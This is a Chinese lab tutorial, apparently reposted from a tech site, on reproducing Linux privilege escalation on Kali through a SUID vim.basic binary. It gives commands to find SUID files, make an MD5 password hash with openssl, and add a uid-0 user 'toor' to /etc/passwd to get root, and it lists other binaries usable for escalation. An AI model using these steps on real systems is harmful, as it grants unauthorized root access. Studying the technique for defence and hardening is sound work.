在kali上复现

先给需要的vim.basic文件设置suid权限

chmod u+s /usr/bin/vim.basic

先adduser test1一个普通权限用户

现在就是一个合适的提权环境

通过以下命令可以找到存在suid权限的文件

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

可用于提权的文件有

nmap

vim

find

bash

more

less

nano

cp

利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户

passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell

这边可以看看root用户的格式

root:x:0:0:root:/root:/bin/bash

(密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)

生成密码:用openssl passwd -1 –salt asd 123 (这里是-1(数字1)不是L)

直接写在passwd文件里面,

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个

这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改

vim.basic /etc/passwd

用这个打开,然后修改文件,就可以成功保存

可以看到已经添加了,su toor切换,密码123,再id查看一下权限

root权限

chmod u+s /usr/bin/vim.basic

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持脚本之家。

linux利用* vim提权,Linux使用suid vim.basic文件实现提权相关推荐

  1. linux suid 脚本,Linux使用suid vim.basic文件实现提权

    在kali上复现 先给需要的vim.basic文件设置suid权限 chmod u+s /usr/bin/vim.basic 先adduser test1一个普通权限用户 现在就是一个合适的提权环境 ...

  2. grub命令 u盘安装linux,利用U盘安装Linux操作系统(grub4dos,USB,Linux)

    前一刻盘太多,手头没有DVD拉,今天又想装一下系统,于是想起以前用过的grub4dos来. 基本思想是把grub4dos装到U盘里,同时将iso文件(3G多)也弄到U盘中,这样直接从U盘启动安装系统. ...

  3. Linux利用子命令m,Linux mdir命令

    Linux mdir命令用于显示MS-DOS目录. mdir为mtools工具指令,模拟MS-DOS的dir指令,可显示MS-DOS文件系统中的目录内容. 语法mdir [-afwx/][目录] 参数 ...

  4. linux利用* vim提权,linux 通过suid vim.basic文件提权

    在kali上复现 先给需要的vim.basic文件设置suid权限 chmod u+s /usr/bin/vim.basic 先adduser test1一个普通权限用户 现在就是一个合适的提权环境 ...

  5. Linux怎么对当前目录提权,linux提权方法(不断总结更新)

    1.suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的: find / -perm -u=s -type f 2> ...

  6. 提权—Linux 定时任务环境变量数据库

    Linux提权环境变量安全-(aliyun,本地): 前提:需要配合SUID进行环境变量提权且是本地用户环境下(因此该方法比较难实现,鸡肋) 提权过程:手写调用文件-编译-复制文件-增加环境变量-执行 ...

  7. Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328

    Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...

  8. linux数字雨代码解释,linux提权 漏洞合集 linux-kernel-exploits

    CVE–2018–1000001 [glibc] (glibc <= 2.26) CVE-2017-1000367 [Sudo] (Sudo 1.8.6p7 – 1.8.20) CVE-2017 ...

  9. 【Linux】软件包管理器 yum 与编辑器 vim 的基本使用

    文章目录 一.yum 背景知识 1.商业生态 2.开源生态 3.软件生态本土化 二.yum 的基本使用 1.查看软件包 2.安装软件 3.卸载软件 三.vim 的基本使用 1.vim 的基本概念 2. ...

最新文章

  1. Nginx + Lua + redis (一)(转)
  2. android ip探测,Android-IpReachabilityMonitor
  3. linux下安装mysql-5.6.41
  4. py2exe打包OpenCV,找不到libiomp5md.dll
  5. 【转】WebServices:WSDL的结构分析
  6. l380废墨收集垫已到使用寿命_湖北雨水收集系统定制
  7. shell学习脚本-tomcat停止脚本
  8. 基金理财系列6 之指数基金
  9. 解决github拉项目慢的问题
  10. zedboard连接pmod oledrgb
  11. java案例代码10--购物车案例--重要
  12. 家用计算机的ram怎么清理,电脑内存满了怎么清理【解决流程】
  13. 微软在上海有哪些办公地点?上下班来回三小时?不止闵大荒!
  14. 树莓派2B使用360随身WiFi2代连接WiFi
  15. TED地道用语学习 - <脆弱的力量> - 3
  16. UE5打包失败:AutomationTool exiting with ExitCode=-532462766 解决方法
  17. 深度linux引导安装教程,deepin深度系统安装教程-电脑系统安装手册
  18. 港股中的老千,千万别碰!
  19. SpringBoot整合Thymeleaf+EasyExcel实现excel文件的读取并展示,附加swagger2配置(超详细示范!)
  20. 跳舞吧机器人爷叶运鹏_【学海有舟,从“融”出发】我,一个残障学生,觉得自己来学校会拖累同学,咋办?...

热门文章

  1. (转)C# 根据当前时间获取,本周,本月,本季度等时间段 .Net中Exception
  2. 创办私营企业必做的16件事
  3. mysql常见错误及解决办法_mysql常见错误代码、原因及处理办法
  4. 树莓派C语言点灯,树莓派3 b GPIO 点亮小灯泡
  5. keepalived nginx 双机热备图文讲解
  6. OK335x mksd.sh hacking
  7. angular_directive动感超人
  8. 专业词汇---BUG部分-02
  9. 使用vim的find命令快速打开文件
  10. linux应用小技巧